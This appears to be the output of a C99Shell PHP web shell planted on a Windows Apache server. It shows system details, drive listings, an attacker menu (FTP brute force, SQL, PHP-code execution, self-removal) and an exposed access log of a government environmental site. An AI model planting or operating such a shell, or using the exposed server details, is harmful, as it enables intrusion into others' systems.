!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.34 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.06.05.log (1.95 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
104.152.52.6 - - [05/Jun/2023:00:00:55 -0500] "GET / HTTP/1.0" 200 319
216.245.221.92 - - [05/Jun/2023:00:02:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:00:02:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40907
172.22.2.4 - - [05/Jun/2023:00:03:44 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17583
52.167.144.158 - - [05/Jun/2023:00:04:06 -0500] "GET /autoliquidacion2020/index.php?dir=Grupo+Forestal+-+Silvicultura%2F HTTP/1.1" 200 2799
172.22.2.4 - - [05/Jun/2023:00:03:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:00:04:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52326
216.245.221.92 - - [05/Jun/2023:00:07:56 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.239 - - [05/Jun/2023:00:10:25 -0500] "GET /BLA/resoluciones/AUTOS%202014/5840.pdf HTTP/1.1" 200 465824
172.22.2.4 - - [05/Jun/2023:00:09:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:00:09:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
173.252.83.10 - - [05/Jun/2023:00:12:11 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
173.252.111.12 - - [05/Jun/2023:00:12:29 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
216.245.221.92 - - [05/Jun/2023:00:12:56 -0500] "HEAD / HTTP/1.1" 200 -
69.171.231.2 - - [05/Jun/2023:00:15:50 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 206 856
69.171.231.5 - - [05/Jun/2023:00:15:51 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 200 856
69.171.231.2 - - [05/Jun/2023:00:15:54 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 206 856
173.252.95.19 - - [05/Jun/2023:00:16:24 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 200 856
173.252.95.2 - - [05/Jun/2023:00:16:24 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 200 856
172.22.2.4 - - [05/Jun/2023:00:14:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.192.232 - - [05/Jun/2023:00:16:41 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/Jun/2023:00:15:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
216.245.221.92 - - [05/Jun/2023:00:17:56 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.97 - - [05/Jun/2023:00:20:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0249.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jun/2023:00:20:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Jun/2023:00:22:56 -0500] "HEAD / HTTP/1.1" 200 -
162.55.175.142 - - [05/Jun/2023:00:23:13 -0500] "GET / HTTP/1.1" 200 319
162.55.175.142 - - [05/Jun/2023:00:23:13 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [05/Jun/2023:00:21:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
31.13.127.16 - - [05/Jun/2023:00:24:40 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 200 856
152.61.128.50 - - [05/Jun/2023:00:25:22 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [05/Jun/2023:00:27:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:00:26:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.102.31.71 - - [05/Jun/2023:00:26:41 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX188SWbXgyPTIVvvHQ4j8j2y+BIPjWvByVojxul590/w8WGh8SeK9ThC&y=U2FsdGVkX19LmSXhobkzZfgrDQGEi8NSf+IYTorNCXNjNMbf2hN8026Cfma/IH7k HTTP/1.1" 200 31
186.102.31.71 - - [05/Jun/2023:00:26:47 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+y8jXeVuBA2O/oPOawFu3Z0HHqpwB0jXD4FTgxH0bJPSEhdgRZxKm0&y=U2FsdGVkX1/rz7NTPp7sFXk9oqi0ztxfEcPZjiLewVmIZ4TZ9+E+816Xc4u9gkWr HTTP/1.1" 200 31
186.102.31.71 - - [05/Jun/2023:00:26:52 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19QimJVJhvkMUmAm2LmEdmT0y9oK7JkeTNOm65lZzDAv+b3GEW7YjZd&y=U2FsdGVkX1+FNTC4jI/0YHgvH4Xf8LS6DdiHyWH0Pu3xFNg2+wvTM/nigeXGqh+Q HTTP/1.1" 200 31
172.22.2.4 - - [05/Jun/2023:00:27:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53924
186.102.31.71 - - [05/Jun/2023:00:27:02 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18mfhCyy4VM61vVD+TRpJtwQWWm7hZas/1n3cznpfzq6Wa3iUqrgU1d&y=U2FsdGVkX18pDK22eDFInkO+RfurPT91NJ2TGRg8TDZDmPcg4Cwegjc2I1TXC9O0 HTTP/1.1" 200 31
186.102.31.71 - - [05/Jun/2023:00:27:23 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+0iNTLubtKdJJu8l89za81giB/K/8ObPOTiijDC9nWulPgr3Re0nvk&y=U2FsdGVkX1+MUTgX7mmLq8Sd8lf3D6QD0IITz03UwxtkvI7+34y1y6+SRz8U5Pm3 HTTP/1.1" 200 31
186.102.31.71 - - [05/Jun/2023:00:27:24 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/kA3vHmnF6nLNvMtxtDjNCrrdWrhHR6dGHDk5xU+NwOuFszKGp9I8T&y=U2FsdGVkX19N1dTfTB4nGK7qMk1BbtvxYJ/IQ1opZe5paboooFo0xFI7Upq/KBb5 HTTP/1.1" 200 31
186.102.31.71 - - [05/Jun/2023:00:28:00 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+6A+Fokp3q7mwfD3UmZin/kpvXmLAWL2rKvNnAewGEUGOMKGrJ9QmU&y=U2FsdGVkX1+6Qox5NBL6vJNMdQQ8HUtUJ+jS3FNheFId5HXqtvIG9eE/2ax8ftMT HTTP/1.1" 200 31
186.102.31.71 - - [05/Jun/2023:00:28:01 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19q0xOjDZx73T6yLNof7yIRLl7oCh1rR0wIhGsiGzgA6dhPOGeXTx1S&y=U2FsdGVkX18I09mEkAsME+ruOZl9b+Q4CvIC48PWOLkQYfY96pKvuVn6SsM8FJ+U HTTP/1.1" 200 31
186.102.31.71 - - [05/Jun/2023:00:28:02 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/zSaBTGSVd2mTinYV4lA1rptpvjnzVQkjJbuvmkPPisfilhLCDxZMo&y=U2FsdGVkX1+mSGs6+CzH6DcIHXPhX6addXqp6GKEUrYImROPP99RNap73Cwg392F HTTP/1.1" 200 31
186.102.31.71 - - [05/Jun/2023:00:28:02 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+4MJawdAhK6Zt1SEbMAsm0jNzTNCbkvUm3n/RqbMgP4pekMrDleLfs&y=U2FsdGVkX19VSJTJ2beqhA0/n7/QAAGnkD03OOkOVqfRE1U8Ut8IGIlb9KTp7UlH HTTP/1.1" 200 31
186.102.31.71 - - [05/Jun/2023:00:28:02 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+QZIjB5srHNTgIrhIywIigrDLFGgYIJzbD5SDh6yeUV7Lw++f2/zvM&y=U2FsdGVkX19GbzPZp8cyudGsqHRTCuxLxSSv23Zxt3udK3wZ+4dxeujMqcWzegF3 HTTP/1.1" 200 31
186.102.31.71 - - [05/Jun/2023:00:28:02 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX195LQO1SlT9P84Mj+rdoNjBRULpXFv7vKklafXzbnYgYG5+RvrZ2XVg&y=U2FsdGVkX1/eeOoyT03McOrgf06SbnY19TSAJ6hXiLExJt6R6rg1R0tDpQ8AYwhd HTTP/1.1" 200 31
172.22.2.4 - - [05/Jun/2023:00:32:33 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [05/Jun/2023:00:31:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
216.245.221.92 - - [05/Jun/2023:00:32:56 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.97 - - [05/Jun/2023:00:33:28 -0500] "GET /BLA/resoluciones/AUTOS%202022/2144.pdf HTTP/1.1" 304 -
69.171.249.20 - - [05/Jun/2023:00:34:01 -0500] "GET /manos-reparadoras-protagonistas-en-la-segunda-feria-de-moda-sostenible.html HTTP/1.1" 206 774
172.22.2.4 - - [05/Jun/2023:00:32:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:00:33:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
40.77.167.97 - - [05/Jun/2023:00:35:41 -0500] "GET /BLA/resoluciones/AUTOS%202020/2202.pdf HTTP/1.1" 304 -
66.249.70.172 - - [05/Jun/2023:00:37:04 -0500] "GET /dia-nacional-del-arbol-atributos-y-caracteristicas-de-las-especies-representativas-de-bogota.html HTTP/1.1" 200 697
216.245.221.92 - - [05/Jun/2023:00:37:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:00:38:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.102.31.71 - - [05/Jun/2023:00:38:06 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18RXyfQJkUZ2MaS9E7/RQRyfe3KNNkc5IzAL7ceQoHyvhHrIlt3tT9r&y=U2FsdGVkX1/N+Y9TX2n37oLD+Nb0n5+DFCVaD+gOlrTYVbIsQs6McuaUgkJ4sxfF HTTP/1.1" 200 31
186.102.31.71 - - [05/Jun/2023:00:38:06 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/RFRM0VagPuN4e4XeGw4Zf1+hDWN5QcNcKo2wKSy/PQLvn2rvtfcq6&y=U2FsdGVkX18S3rb1mwy2KdvAsc3ecDR2Gvo0tHKvv7b9lzHomdN3WYdTs3P0R0mn HTTP/1.1" 200 31
186.102.31.71 - - [05/Jun/2023:00:38:06 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+9lV6XGSJh4lODpiDzlQacE2ZZa0sSuDvf0gdFN7iXo1ycgpjlZP9r&y=U2FsdGVkX19KxYU08xhCh2HmNk3RLpdRprrYf3G1eEO/rMPOnMITinocW0zHyE// HTTP/1.1" 200 31
186.102.31.71 - - [05/Jun/2023:00:38:06 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/3IrngP02AQg8AY3TuJ2PzGZGFuV2TkMg5XIUXZu2OIc7GaPXOhZGV&y=U2FsdGVkX19dOg9qEC5ezVi1DPVZZcXwP3xlqQw9bEAz+TmdU5wGnETAbZpGCrlt HTTP/1.1" 200 31
172.22.2.4 - - [05/Jun/2023:00:39:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55571
216.245.221.92 - - [05/Jun/2023:00:42:56 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.97 - - [05/Jun/2023:00:43:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/3964.pdf HTTP/1.1" 304 -
40.77.167.97 - - [05/Jun/2023:00:44:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0879.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jun/2023:00:44:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.158 - - [05/Jun/2023:00:46:10 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 397891
172.22.2.4 - - [05/Jun/2023:00:44:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52730
216.245.221.92 - - [05/Jun/2023:00:47:56 -0500] "HEAD / HTTP/1.1" 200 -
152.61.192.232 - - [05/Jun/2023:00:50:26 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [05/Jun/2023:00:50:27 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [05/Jun/2023:00:50:27 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [05/Jun/2023:00:49:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:00:50:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
216.245.221.92 - - [05/Jun/2023:00:52:56 -0500] "HEAD / HTTP/1.1" 200 -
186.84.20.11 - - [05/Jun/2023:00:54:22 -0500] "GET /mujeres-secretaria-de-ambiente-abre-nueva-convocatoria-para-aprender-sobre-el-cuidado-de-los-humedales.html HTTP/1.1" 200 853
173.252.107.16 - - [05/Jun/2023:00:54:23 -0500] "GET /mujeres-secretaria-de-ambiente-abre-nueva-convocatoria-para-aprender-sobre-el-cuidado-de-los-humedales.html HTTP/1.1" 200 853
173.252.107.119 - - [05/Jun/2023:00:54:24 -0500] "GET /mujeres-secretaria-de-ambiente-abre-nueva-convocatoria-para-aprender-sobre-el-cuidado-de-los-humedales.html HTTP/1.1" 200 853
52.167.144.158 - - [05/Jun/2023:00:54:30 -0500] "GET /BLA/resoluciones/AUTOS%202022/0703.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jun/2023:00:55:22 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-672-14.docx HTTP/1.1" 304 -
172.22.2.4 - - [05/Jun/2023:00:57:21 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [05/Jun/2023:00:55:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:00:57:39 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [05/Jun/2023:00:57:44 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [05/Jun/2023:00:57:44 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
216.245.221.92 - - [05/Jun/2023:00:57:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:00:56:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
114.119.142.173 - - [05/Jun/2023:01:00:25 -0500] "-" 408 -
216.245.221.92 - - [05/Jun/2023:01:02:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:01:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.83.85 - - [05/Jun/2023:01:03:40 -0500] "GET /BLA/resoluciones/AUTOS%202023/2074.pdf HTTP/1.1" 200 662004
66.249.83.85 - - [05/Jun/2023:01:03:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4427.pdf HTTP/1.1" 200 579762
66.249.83.85 - - [05/Jun/2023:01:03:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2913.pdf HTTP/1.1" 200 470601
172.22.2.4 - - [05/Jun/2023:01:02:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52326
190.27.182.224 - - [05/Jun/2023:01:07:27 -0500] "GET /BLA/resoluciones/AUTOS%202015/3405.pdf HTTP/1.1" 200 1099786
216.245.221.92 - - [05/Jun/2023:01:07:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:07:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:08:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
152.61.128.50 - - [05/Jun/2023:01:11:22 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [05/Jun/2023:01:11:23 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [05/Jun/2023:01:11:24 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [05/Jun/2023:01:12:56 -0500] "HEAD / HTTP/1.1" 200 -
69.63.184.4 - - [05/Jun/2023:01:13:25 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
157.55.39.239 - - [05/Jun/2023:01:14:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1943.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jun/2023:01:13:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:13:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48260
66.220.149.1 - - [05/Jun/2023:01:15:11 -0500] "GET /images/foto%202.jpg HTTP/1.1" 200 63300
172.22.2.4 - - [05/Jun/2023:01:14:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51977
216.245.221.92 - - [05/Jun/2023:01:17:56 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.175 - - [05/Jun/2023:01:19:53 -0500] "-" 408 -
172.22.2.4 - - [05/Jun/2023:01:19:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.205 - - [05/Jun/2023:01:20:51 -0500] "GET /portaldeninos/aulas-ambientales/aula-ambiental-sorotama/ HTTP/1.1" 503 1037
172.22.2.4 - - [05/Jun/2023:01:19:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52326
216.245.221.92 - - [05/Jun/2023:01:22:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:23:08 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [05/Jun/2023:01:23:08 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [05/Jun/2023:01:23:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61759
40.77.167.97 - - [05/Jun/2023:01:24:58 -0500] "GET /BLA/resoluciones/AUTOS%202018/2018.pdf HTTP/1.1" 200 254194
172.22.2.4 - - [05/Jun/2023:01:24:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:25:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
216.245.221.92 - - [05/Jun/2023:01:27:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:28:41 -0500] "POST /BLA/boletinlegal/Autodiscover/Autodiscover.xml HTTP/1.1" 404 1018
66.249.83.84 - - [05/Jun/2023:01:30:29 -0500] "GET /BLA/resoluciones/AUTOS%202023/1410.pdf HTTP/1.1" 200 419547
69.171.251.18 - - [05/Jun/2023:01:30:59 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 206 856
69.171.251.18 - - [05/Jun/2023:01:31:03 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 206 856
172.22.2.4 - - [05/Jun/2023:01:30:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Jun/2023:01:32:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:31:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
157.55.39.239 - - [05/Jun/2023:01:35:28 -0500] "GET /appsia/controlador HTTP/1.1" 503 1020
52.167.144.158 - - [05/Jun/2023:01:35:34 -0500] "GET /Publicaciones/2023EE92333.pdf HTTP/1.1" 404 227
200.118.60.119 - - [05/Jun/2023:01:35:48 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
200.118.60.119 - - [05/Jun/2023:01:35:51 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 582538
216.245.221.92 - - [05/Jun/2023:01:37:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:36:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:37:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58663
216.245.221.92 - - [05/Jun/2023:01:42:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:42:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.97 - - [05/Jun/2023:01:44:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/4501.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Jun/2023:01:43:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
173.252.83.12 - - [05/Jun/2023:01:46:15 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
216.245.221.92 - - [05/Jun/2023:01:47:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:48:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:49:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56287
216.245.221.92 - - [05/Jun/2023:01:52:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:54:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:01:54:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55571
216.245.221.92 - - [05/Jun/2023:01:57:56 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.181 - - [05/Jun/2023:02:00:16 -0500] "-" 408 -
172.22.2.4 - - [05/Jun/2023:01:59:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:00:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
216.245.221.92 - - [05/Jun/2023:02:02:56 -0500] "HEAD / HTTP/1.1" 200 -
123.125.109.56 - - [05/Jun/2023:02:06:26 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/Jun/2023:02:05:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Jun/2023:02:07:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:06:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53561
198.235.24.154 - - [05/Jun/2023:02:10:30 -0500] "\x16\x03\x01" 400 226
179.43.177.244 - - [05/Jun/2023:02:11:20 -0500] "GET / HTTP/1.1" 200 319
200.118.60.119 - - [05/Jun/2023:02:12:25 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
200.118.60.119 - - [05/Jun/2023:02:12:25 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
200.118.60.119 - - [05/Jun/2023:02:12:26 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
200.118.60.119 - - [05/Jun/2023:02:12:26 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
200.118.60.119 - - [05/Jun/2023:02:12:25 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 582538
200.118.60.119 - - [05/Jun/2023:02:12:26 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
200.118.60.119 - - [05/Jun/2023:02:12:27 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
200.118.60.119 - - [05/Jun/2023:02:12:28 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
200.118.60.119 - - [05/Jun/2023:02:12:30 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 582538
216.245.221.92 - - [05/Jun/2023:02:12:56 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:11:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:12:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
69.63.184.7 - - [05/Jun/2023:02:14:18 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
190.157.186.50 - - [05/Jun/2023:02:14:44 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.22.2.4 - - [05/Jun/2023:02:17:08 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 304 -
216.245.221.92 - - [05/Jun/2023:02:17:55 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.239 - - [05/Jun/2023:02:18:15 -0500] "GET /BLA/resoluciones/AUTOS%202022/2112.pdf HTTP/1.1" 200 447056
66.249.69.2 - - [05/Jun/2023:02:18:34 -0500] "-" 408 -
172.22.2.4 - - [05/Jun/2023:02:17:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:18:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50664
172.22.2.4 - - [05/Jun/2023:02:19:12 -0500] "OPTIONS /BLA/boletinlegal/ HTTP/1.1" 200 45003
216.245.221.92 - - [05/Jun/2023:02:22:55 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:23:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Jun/2023:02:24:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
144.217.74.133 - - [05/Jun/2023:02:27:25 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 200 856
220.151.9.22 - - [05/Jun/2023:02:27:42 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [05/Jun/2023:02:27:55 -0500] "HEAD / HTTP/1.1" 200 -
31.13.103.24 - - [05/Jun/2023:02:28:16 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
172.22.2.4 - - [05/Jun/2023:02:29:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
31.13.103.5 - - [05/Jun/2023:02:31:21 -0500] "GET /manos-reparadoras-protagonistas-en-la-segunda-feria-de-moda-sostenible.html HTTP/1.1" 206 774
31.13.103.3 - - [05/Jun/2023:02:31:22 -0500] "GET /manos-reparadoras-protagonistas-en-la-segunda-feria-de-moda-sostenible.html HTTP/1.1" 206 774
31.13.103.9 - - [05/Jun/2023:02:31:26 -0500] "GET /manos-reparadoras-protagonistas-en-la-segunda-feria-de-moda-sostenible.html HTTP/1.1" 206 774
